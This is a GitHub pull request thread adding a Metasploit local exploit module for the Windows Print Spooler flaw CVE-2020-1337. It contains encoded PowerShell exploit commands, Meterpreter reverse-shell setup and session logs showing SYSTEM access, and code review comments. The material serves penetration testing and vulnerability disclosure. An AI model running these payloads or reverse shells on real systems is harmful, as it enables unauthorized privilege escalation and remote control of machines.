[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBIADQAcwBJAEEASwBWAGwAMgBsADgAQwBBADQAMgBPAFEAUQB1AEMAUQBCAEMARgAvADAAcQBIAEQAWgBYAFMAVQAzAFEAdwB1AG0AUQBXAG4AbwBMAE0ATABoAEsAaAAyADEAQwBiADcAbQB6AE0ATABtAEoAawAvADcAMgBWAEMAagBvADIAcAA4AGUAOAB4AC8AZABlAEgAbQBNAGoAUwBLAEUARQBOAEkAYwB3AFgASQBQADUAZQBlAHcATABFAGsAVgBaAGcAMwBhAGQAVABBAE0ANQBYAGwARABCAFgAWABjAHAAMQBNAEMATgBuAHgAbwBTAGUAQgA1AGMAOQBGAFkAbQBNAGwAcAAyAHEAUwBMAGoAYgA4AHEAcgA5AGIAcgBoAGcALwBIAFIAUABQADgASAA3AHIATABqACsASQBOAC8AegBoAEoAcwBWAEEAVgArADMATgA0AEkAdABCAFkASwBCADgAeABsAGIAcgA2AEQAMQBnAFEAeABjAG4AVwB5AGoAWgBhAFUAbwBiAEEAYQBBAGsAdAA4AHIAKwBoAEQAawBjAEkARwBxAEMAOQBhAGsAWgBLAEwAUQBzAE4AMAA4AG4AVwA1ADEAOQA4AEwAeQBMAEgAWABiAE8AMABBAEEAQQBBAD0AJwApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA=
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBIADQAcwBJAEEASwBWAGwAMgBsADgAQwBBADQAMgBPAFEAUQB1AEMAUQBCAEMARgAvADAAcQBIAEQAWgBYAFMAVQAzAFEAdwB1AG0AUQBXAG4AbwBMAE0ATABoAEsAaAAyADEAQwBiADcAbQB6AE0ATABtAEoAawAvADcAMgBWAEMAagBvADIAcAA4AGUAOAB4AC8AZABlAEgAbQBNAGoAUwBLAEUARQBOAEkAYwB3AFgASQBQADUAZQBlAHcATABFAGsAVgBaAGcAMwBhAGQAVABBAE0ANQBYAGwARABCAFgAWABjAHAAMQBNAEMATgBuAHgAbwBTAGUAQgA1AGMAOQBGAFkAbQBNAGwAcAAyAHEAUwBMAGoAYgA4AHEAcgA5AGIAcgBoAGcALwBIAFIAUABQADgASAA3AHIATABqACsASQBOAC8AegBoAEoAcwBWAEEAVgArADMATgA0AEkAdABCAFkASwBCADgAeABsAGIAcgA2AEQAMQBnAFEAeABjAG4AVwB5AGoAWgBhAFUAbwBiAEEAYQBBAGsAdAA4AHIAKwBoAEQAawBjAEkARwBxAEMAOQBhAGsAWgBLAEwAUQBzAE4AMAA4AG4AVwA1ADEAOQA4AEwAeQBMAEgAWABiAE8AMABBAEEAQQBBAD0AJwApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= -InputFormat None
[+] Cleaning up 5972
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBIADQAcwBJAEEASwBwAGwAMgBsADgAQwBBADQAdAAyAHoAUwB2AEwATABNAHIAUAB5ADAAMwBOAEsANABtADEAcwBuAEoAUABMAFUARQBTAEMARQBzAHMAeQBrAHgATQB5AGsAawB0ADEAbABBAFAATABVADQAdABVAHQAZgBVAHkAMAA2AHQATABLADQASgBUAHMAMQBKAFQAUwA3AFIARABTADQAcAB5AHMAeABMAFYAOABnAG8ARABzAHIAMQB6AEgAVgAyAHEAVgBHAHQAagBrAFkAMQBMAEIAaQByAFkAUgBvAHEAOABUAG8AcQBlAGEAVQA1AE8AVABwAFEAUQAyAHMAQgBTAFAAYQBUAHIANABRAEEAQQBBAEEAPQAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApAGUAYwBoAG8AIAAnAE4AcQBCAEcAVwBhAHoASQAnADsA -InputFormat None
[*] Exploit output:
#< CLIXML
[+] Added PrinterPort successfully on C:\Users\msfuser\AppData\Local\Temp\XLNioGOxfU\ualapi.dll
[+] Mount point created successfully on C:\Windows\system32
True
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><Obj S="progress" RefId="1"><TNRef RefId="0" /><MS><I64 N="SourceId">2</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><Obj S="progress" RefId="2"><TNRef RefId="0" /><MS><I64 N="SourceId">3</I64><PR N="Record"><AV>Remove-Printer -Name ZVRhh -ErrorAction SilentlyContinue | Out-Null</AV><AI>1249526970</AI><Nil /><PI>-1</PI><PC>100</PC><T>Completed</T><SR>0</SR><SD>1/1 completed</SD></PR></MS></Obj><Obj S="progress" RefId="3"><TNRef RefId="0" /><MS><I64 N="SourceId">4</I64><PR N="Record"><AV>Remove-PrinterPort -Name C:\Users\msfuser\AppData\Local\Temp\XLNioGOxfU\ualapi.dll -ErrorAction SilentlyContinue | Out-Null</AV><AI>2121746085</AI><Nil /><PI>-1</PI><PC>100</PC><T>Completed</T><SR>0</SR><SD>1/1 completed</SD></PR></MS></Obj><Obj S="progress" RefId="4"><TNRef RefId="0" /><MS><I64 N="SourceId">5</I64><PR N="Record"><AV>Add-PrinterDriver -Name "Generic / Text Only"</AV><AI>1947714376</AI><Nil /><PI>-1</PI><PC>100</PC><T>Completed</T><SR>0</SR><SD>1/1 completed</SD></PR></MS></Obj><Obj S="progress" RefId="5"><TNRef RefId="0" /><MS><I64 N="SourceId">6</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><Obj S="progress" RefId="6"><TNRef RefId="0" /><MS><I64 N="SourceId">7</I64><PR N="Record"><AV>Add-PrinterPort -Name C:\Users\msfuser\AppData\Local\Temp\XLNioGOxfU\ualapi.dll  | Out-Null</AV><AI>1119052494</AI><Nil /><PI>-1</PI><PC>100</PC><T>Completed</T><SR>0</SR><SD>1/1 completed</SD></PR></MS></Obj><Obj S="information" RefId="7"><TN RefId="1"><T>System.Management.Automation.InformationRecord</T><T>System.Object</T></TN><ToString>[+] Added PrinterPort successfully on C:\Users\msfuser\AppData\Local\Temp\XLNioGOxfU\ualapi.dll</ToString><Props><Obj N="MessageData" RefId="8"><TN RefId="2"><T>System.Management.Automation.HostInformationMessage</T><T>System.Object</T></TN><ToString>[+] Added PrinterPort successfully on C:\Users\msfuser\AppData\Local\Temp\XLNioGOxfU\ualapi.dll</ToString><Props><S N="Message">[+] Added PrinterPort successfully on C:\Users\msfuser\AppData\Local\Temp\XLNioGOxfU\ualapi.dll</S><B N="NoNewLine">false</B><S N="ForegroundColor">DarkYellow</S><S N="BackgroundColor">DarkMagenta</S></Props></Obj><S N="Source">Write-Host</S><DT N="TimeGenerated">2020-11-13T23:59:01.4597769-08:00</DT><Obj N="Tags" RefId="9"><TN RefId="3"><T>System.Collections.Generic.List`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</T><T>System.Object</T></TN><LST><S>PSHOST</S></LST></Obj><S N="User">DESKTOP-CL5L2IH\msfuser</S><S N="Computer">DESKTOP-CL5L2IH</S><U32 N="ProcessId">5972</U32><U32 N="NativeThreadId">6992</U32><U32 N="ManagedThreadId">8</U32></Props></Obj><Obj S="information" RefId="10"><TNRef RefId="1" /><ToString>[+] Mount point created successfully on C:\Windows\system32</ToString><Props><Obj N="MessageData" RefId="11"><TNRef RefId="2" /><ToString>[+] Mount point created successfully on C:\Windows\system32</ToString><Props><S N="Message">[+] Mount point created successfully on C:\Windows\system32</S><B N="NoNewLine">false</B><S N="ForegroundColor">DarkYellow</S><S N="BackgroundColor">DarkMagenta</S></Props></Obj><S N="Source">Write-Host</S><DT N="TimeGenerated">2020-11-13T23:59:01.4910252-08:00</DT><Obj N="Tags" RefId="12"><TNRef RefId="3" /><LST><S>PSHOST</S></LST></Obj><S N="User">DESKTOP-CL5L2IH\msfuser</S><S N="Computer">DESKTOP-CL5L2IH</S><U32 N="ProcessId">5972</U32><U32 N="NativeThreadId">6992</U32><U32 N="ManagedThreadId">8</U32></Props></Obj><Obj S="progress" RefId="13"><TNRef RefId="0" /><MS><I64 N="SourceId">8</I64><PR N="Record"><AV>Add-Printer -Name "ZVRhh" -DriverName "Generic / Text Only" -PortName "C:\Users\msfuser\AppData\Local\Temp\XLNioGOxfU\ualapi.dll" | Out-Null</AV><AI>1217475551</AI><Nil /><PI>-1</PI><PC>100</PC><T>Completed</T><SR>0</SR><SD>1/1 completed</SD></PR></MS></Obj></Objs>
[*] 192.168.132.134 - Meterpreter session 3 closed.  Reason: Died
[*] Sending stage (200262 bytes) to 192.168.132.134
[*] Meterpreter session 4 opened (192.168.135.197:4444 -> 192.168.132.134:49669) at 2020-12-16 13:54:49 -0600

meterpreter > sysinfo
Computer        : DESKTOP-CL5L2IH
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

@bwatters-r7 bwatters-r7 marked this pull request as draft November 21, 2020 00:02
@bwatters-r7 bwatters-r7 marked this pull request as ready for review December 16, 2020 19:58
@label-actions
Copy link

label-actions bot commented Dec 16, 2020

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@bwatters-r7
Copy link
Contributor Author

So this still is kind of hanging out while I get a better idea on why a specific-length comment is required inside the powershell script.

length comment is required for the exploit to work.
@bwatters-r7
Copy link
Contributor Author

Rather than do troubleshooting on the comment, I've replaced the exec_psh call with execute_string, sidestepping the issue. It does mean that you must have a windows meterpreter session to use this module.

@cdelafuente-r7 cdelafuente-r7 self-assigned this Jan 8, 2021
Copy link
Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for this module @bwatters-r7 ! I successfully got a SYSTEM session on a unpatched genuine Windows 10 (build 10240). I left a few comments for you to review.

return Exploit::CheckCode::Appears if sysinfo_value =~ /10/ && build_num <= 18363

return Exploit::CheckCode::Safe
end
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I'm wondering if this method should also check if it is actually a Windows before checking the build number?

end

def validate_active_host
begin
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Not a blocker, but you can skip begin ... end block when wrapping the entire method in a rescue clause:

  def validate_active_host
    print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
  rescue Rex::Post::Meterpreter::RequestError => e
    elog('Could not connect to session', error: e)
    raise Msf::Exploit::Failed, 'Could not connect to session'
  end

data/exploits/CVE-2020-1337/cve-2020-1337.ps1 Outdated Show resolved Hide resolved
Removed unused method from ps script
Cleaned up some code in the module
Added removal instructions to the documentation
@bwatters-r7
Copy link
Contributor Author

Thanks so much @cdelafuente-r7! I tried to make all the changes suggested and more.

@cdelafuente-r7
Copy link
Contributor

Thanks @bwatters-r7 for the updates. Everything looks good now. I tested against Windows 10 (build 10240) and got a SYSTEM session after reboot. I also verified the cleanup procedure works using the established session.

Note that I couldn't find a target where the previous exploit (CVE-2020-1048) didn't work and, therefore, couldn't check if this exploit bypassed the first patch.

I'll go ahead and land it.

Output

msf6 > use exploit/windows/local/cve_2020_1337_printerdemon
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.144.1 -P 4444
[*] Payload handler running as background job 0.

[*] Started reverse TCP handler on 192.168.144.1:4444
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > [*] Sending stage (200262 bytes) to 192.168.144.131
[*] Meterpreter session 1 opened (192.168.144.1:4444 -> 192.168.144.131:49449) at 2021-01-15 18:57:38 +0100

msf6 exploit(windows/local/cve_2020_1337_printerdemon) > set session 1
session => 1
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > set LHOST 192.168.144.1
LHOST => 192.168.144.1
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > set RESTART_TARGET true
RESTART_TARGET => true
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > set verbose true
verbose => true
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > options

Module options (exploit/windows/local/cve_2020_1337_printerdemon):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DESTINATION_FILE                   no        Filename to overwrite (ualapi.dll by default).
   DESTINATION_PATH                   no        Location of file to overwrite (%WINDIR%\system32\ by default).
   JUNCTION_PATH                      no        Path to use as junction (%TEMP%/%RAND% by default).
   PRINTER_NAME      lnDTtfpe         yes       Printer Name to use (%RAND% by default).
   RESTART_TARGET    true             no        Restart the target after exploit (you will lose your session until a second reboot).
   SESSION           1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.144.1    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/cve_2020_1337_printerdemon) > run

[*] Executing automatic check (disable AutoCheck to override)
[*] Build Number = 10240
[+] The target appears to be vulnerable.
[*] Checking Target
[*] Attempting to PrivEsc on DESKTOP-2PGU9IP via session ID: 1
[*] Target Arch = x64
[*] Payload Arch = x64
[*] Replacing variables
[*] Running Exploit on DESKTOP-2PGU9IP
[*] Rebooting DESKTOP-2PGU9IP
[*] 192.168.144.131 - Meterpreter session 1 closed.  Reason: Died

[*] Sending stage (200262 bytes) to 192.168.144.131
[*] Meterpreter session 2 opened (192.168.144.1:4444 -> 192.168.144.131:49411) at 2021-01-15 19:00:12 +0100

^C[-] Exploit failed [user-interrupt]: Interrupt
[-] run: Interrupted
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-2PGU9IP
OS              : Windows 10 (10.0 Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x64/windows
meterpreter >
meterpreter > shell
Process 2932 created.
Channel 1 created.
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32>dir ual*
dir ual*
 Volume in drive C has no label.
 Volume Serial Number is B837-8118

 Directory of C:\Windows\system32

01/15/2021  06:59 PM             8,704 ualapi.dll
               1 File(s)          8,704 bytes
               0 Dir(s)  47,583,277,056 bytes free

C:\Windows\system32>del ualapi.dll
del ualapi.dll
C:\Windows\system32\ualapi.dll
Access is denied.

C:\Windows\system32>sc config spooler start= disabled
sc config spooler start= disabled
[SC] ChangeServiceConfig SUCCESS

C:\Windows\system32>taskkill /F /IM spoolsv.exe
taskkill /F /IM spoolsv.exe
SUCCESS: The process "spoolsv.exe" with PID 1184 has been terminated.

C:\Windows\system32>del ualapi.dll
del ualapi.dll

C:\Windows\system32>dir ual*
dir ual*
 Volume in drive C has no label.
 Volume Serial Number is B837-8118

 Directory of C:\Windows\system32

File Not Found

C:\Windows\system32>sc config spooler start= auto
sc config spooler start= auto
[SC] ChangeServiceConfig SUCCESS

C:\Windows\system32>sc start spooler
sc start spooler

SERVICE_NAME: spooler
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 2692
        FLAGS              :

C:\Windows\system32>exit
exit

@cdelafuente-r7 cdelafuente-r7 merged commit c881925 into rapid7:master Jan 15, 2021
@cdelafuente-r7
Copy link
Contributor

cdelafuente-r7 commented Jan 15, 2021

Release Notes

New module exploits/windows/local/cve_2020_1337_printerdemon provides a local exploit to leverage an arbitrary file write vulnerability in the Spooler service on Windows for achieving code execution as NT AUTHORITY\SYSTEM. This is a bypass of the patch for CVE-2020-1048 and is identified as CVE-2020-1337.

@adfoster-r7 adfoster-r7 added the rn-modules release notes for new or majorly enhanced modules label Jan 22, 2021
@bwatters-r7 bwatters-r7 deleted the add-cve-2020-1337 branch October 5, 2021 19:48
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

3 participants